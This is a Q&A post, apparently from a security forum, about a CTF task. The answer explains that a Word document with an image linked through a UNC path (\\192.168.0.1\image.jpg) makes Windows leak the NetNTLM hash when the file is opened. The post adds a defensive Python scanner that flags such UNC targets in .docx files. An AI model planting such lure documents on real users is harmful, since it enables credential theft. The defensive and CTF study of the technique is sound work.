
In one CTF, I encountered a task that is solved by getting NetNTLM / NTLM or just getting the username.

Tell me, please, is there any protocol that automatically sends NetNTLM / NTLM or username, when the connection is initialized?

The victim uses Windows 10.

Sp1nal

1 Answer

UNC paths:

\\myserver\resource

The type of attack that uses this is sending a Word document with an image embedded in it, using a UNC path as the reference:

\\192.168.0.1\image.jpg

Your machine will try to authenticate to the share to get the image and in doing so pass along the NetNTLM hash.

Joe
McMatty
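A defender-side check for the document case described in the answer, as an added example that is not part of the original posts: it scans the relationship parts of a `.docx` package for external targets that point at a remote host. The function names are hypothetical, the sample package is constructed (a relationships part only, reusing the address from the answer), and it assumes the linked image is stored as a relationship with `TargetMode="External"`, which is how OOXML records linked resources.

```python
import io
import zipfile
import xml.etree.ElementTree as ET  # for untrusted files, defusedxml is the safer parser

REL = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
IMG = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"

def is_remote_file_target(target):
    # True for UNC-style targets: backslash or forward-slash host paths and file://host/...
    t = target.strip().replace("\\", "/").lower()
    if t.startswith("file:"):
        t = t[5:]
        if t.startswith("////"):          # file:////host/share is also a UNC form
            t = "//" + t.lstrip("/")
    # "///c:/..." (local drive via file:///) has a third slash and is not remote
    return t.startswith("//") and len(t) > 2 and t[2] != "/"

def find_unc_relationships(docx_bytes):
    """Return (part, relationship kind, target) for external targets on a remote host."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            for rel in ET.fromstring(pkg.read(name)).iter(REL):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and is_remote_file_target(target):
                    hits.append((name, rel.get("Type", "").rsplit("/", 1)[-1], target))
    return hits

def build_sample():
    """Constructed relationships part only (not a working document), for the scan."""
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{IMG}" Target="media/image1.png"/>'
        f'<Relationship Id="rId2" Type="{IMG}" TargetMode="External" '
        r'Target="\\192.168.0.1\image.jpg"/>'
        '<Relationship Id="rId3" TargetMode="External" Target="https://example.com/" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    for part, kind, target in find_unc_relationships(build_sample()):
        print(f"{part}: external {kind} -> {target}")
```

Only the external image with a UNC target is reported; the embedded image and the HTTPS hyperlink are ignored.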